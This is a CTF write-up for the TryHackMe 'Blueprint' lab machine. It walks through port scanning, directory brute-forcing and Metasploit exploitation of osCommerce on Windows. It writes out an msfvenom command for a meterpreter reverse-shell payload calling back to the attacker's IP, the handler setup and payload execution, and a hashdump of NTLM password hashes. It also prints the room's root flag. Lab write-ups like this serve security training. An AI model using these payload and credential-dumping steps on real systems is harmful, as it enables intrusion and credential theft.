mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-22 20:13:02 +00:00
208 lines
5.8 KiB
Markdown
208 lines
5.8 KiB
Markdown
# TryHackMe-Blueprint
|
|
|
|
>Abdullah Rizwan | 23th September , 11:03 PM
|
|
|
|
## NMAP
|
|
|
|
```
|
|
nmap -sC -sV $IP
|
|
|
|
```
|
|
|
|
```
|
|
Nmap scan report for 10.10.37.223
|
|
Host is up (0.38s latency).
|
|
Not shown: 987 closed ports
|
|
PORT STATE SERVICE VERSION
|
|
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|
|
|_http-server-header: Microsoft-IIS/7.5
|
|
135/tcp open msrpc Microsoft Windows RPC
|
|
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|
|
443/tcp open ssl/http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
|
|
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|
|
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
|
|
3306/tcp open mysql MariaDB (unauthorized)
|
|
8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
|
|
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|
|
49152/tcp open msrpc Microsoft Windows RPC
|
|
49153/tcp open msrpc Microsoft Windows RPC
|
|
49154/tcp open msrpc Microsoft Windows RPC
|
|
49158/tcp open msrpc Microsoft Windows RPC
|
|
49159/tcp open msrpc Microsoft Windows RPC
|
|
49160/tcp open msrpc Microsoft Windows RPC
|
|
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows
|
|
|
|
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
|
Nmap done: 1 IP address (1 host up) scanned in 111.42 seconds
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
## Gobuster
|
|
|
|
|
|
```
|
|
Gobuster v3.0.1
|
|
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
|
|
===============================================================
|
|
[+] Url: http://10.10.37.223:8080
|
|
[+] Threads: 10
|
|
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
|
|
[+] Status codes: 200,204,301,302,307,401,403
|
|
[+] User Agent: gobuster/3.0.1
|
|
[+] Timeout: 10s
|
|
===============================================================
|
|
2020/09/23 14:30:08 Starting gobuster
|
|
===============================================================
|
|
/.htaccess (Status: 403)
|
|
/.hta (Status: 403)
|
|
/.htpasswd (Status: 403)
|
|
/aux (Status: 403)
|
|
/cgi-bin/ (Status: 403)
|
|
/com2 (Status: 403)
|
|
/com3 (Status: 403)
|
|
/com1 (Status: 403)
|
|
/con (Status: 403)
|
|
/licenses (Status: 403)
|
|
/lpt1 (Status: 403)
|
|
/lpt2 (Status: 403)
|
|
/nul (Status: 403)
|
|
/phpmyadmin (Status: 403)
|
|
/prn (Status: 403)
|
|
/server-status (Status: 200)
|
|
/server-info (Status: 200)
|
|
/webalizer (Status: 403)
|
|
===============================================================
|
|
2020/09/23 14:32:46 Finished
|
|
|
|
```
|
|
|
|
|
|
## PORT 8080
|
|
|
|
|
|
<img scr="https://imgur.com/BFgp2dj.png" />
|
|
|
|
|
|
I looked up on exploitdb for `osCommerce 2.4.3` and found many exploits one of which was
|
|
|
|
|
|
<img src="https://imgur.com/vMcOi7I.png" />
|
|
|
|
<img src="https://imgur.com/nUiVxuX.png"/>
|
|
|
|
|
|
For me this exploit failed since I cannot make a new installation of database and RCE depends upon this step to be finished.
|
|
|
|
|
|
## Metasploit
|
|
|
|
I looked on msfconsole if there was an exploit available
|
|
|
|
<img src="https://imgur.com/xnu5rzj.png"/>
|
|
|
|
<img src="https://imgur.com/FAjAfSx.png"/>
|
|
|
|
<img src="https://imgur.com/jKf21kZ.png"/>
|
|
|
|
Then navigate to `C:\Users\Administrator\Desktop`
|
|
|
|
root flag : `THM{aea1e3ce6fe7f89e10cea833ae009bee}`
|
|
|
|
|
|
Now we cannot load `kiwi` because it is not stabilized so we are going to create a payload
|
|
|
|
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.8.94.60 LPORT=7777 -f exe > shell.exe`
|
|
|
|
|
|
Upload the payload on the machine
|
|
```
|
|
meterpreter > upload shell.exe
|
|
[*] uploading : shell.exe -> shell.exe
|
|
[*] Uploaded -1.00 B of 72.07 KiB (-0.0%): shell.exe -> shell.exe
|
|
[*] uploaded : shell.exe -> shell.exe
|
|
meterpreter > ls
|
|
Listing: C:\Users\Administrator\Desktop
|
|
=======================================
|
|
|
|
Mode Size Type Last modified Name
|
|
---- ---- ---- ------------- ----
|
|
100666/rw-rw-rw- 282 fil 2019-04-11 18:36:47 -0400 desktop.ini
|
|
100666/rw-rw-rw- 37 fil 2019-11-27 13:15:37 -0500 root.txt.txt
|
|
100777/rwxrwxrwx 73802 fil 2020-09-23 15:02:08 -0400 shell.exe
|
|
|
|
meterpreter >
|
|
|
|
|
|
```
|
|
|
|
Start another msfconsole
|
|
|
|
```
|
|
msf5 > use exploit/multi/handler
|
|
[*] Using configured payload generic/shell_reverse_tcp
|
|
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
|
|
payload => windows/meterpreter/reverse_tcp
|
|
msf5 exploit(multi/handler) > show options
|
|
|
|
Module options (exploit/multi/handler):
|
|
|
|
Name Current Setting Required Description
|
|
---- --------------- -------- -----------
|
|
|
|
|
|
Payload options (windows/meterpreter/reverse_tcp):
|
|
|
|
Name Current Setting Required Description
|
|
---- --------------- -------- -----------
|
|
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
|
|
LHOST yes The listen address (an interface may be specified)
|
|
LPORT 4444 yes The listen port
|
|
|
|
|
|
Exploit target:
|
|
|
|
Id Name
|
|
-- ----
|
|
0 Wildcard Target
|
|
|
|
|
|
msf5 exploit(multi/handler) > set LHOST 10.8.94.60
|
|
LHOST => 10.8.94.60
|
|
msf5 exploit(multi/handler) > set LPORT 7777
|
|
LPORT => 7777
|
|
msf5 exploit(multi/handler) >
|
|
|
|
```
|
|
|
|
### Meterpreter on unstabilized Shell
|
|
|
|
```
|
|
meterpreter > execute -f shell.exe
|
|
Process 5212 created.
|
|
meterpreter >
|
|
|
|
```
|
|
|
|
### Meterperter for getting stablized shell
|
|
|
|
|
|
```
|
|
msf5 exploit(multi/handler) > exploit
|
|
|
|
[*] Started reverse TCP handler on 10.8.94.60:7777
|
|
[*] Sending stage (176195 bytes) to 10.10.143.248
|
|
[*] Meterpreter session 1 opened (10.8.94.60:7777 -> 10.10.143.248:49167) at 2020-09-23 15:13:54 -0400
|
|
|
|
meterpreter > getuid
|
|
Server username: NT AUTHORITY\SYSTEM
|
|
meterpreter > hashdump
|
|
Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411:::
|
|
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
|
|
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::
|
|
meterpreter >
|
|
|
|
```
|
|
Visit Crackstation for cracking NTLM hash
|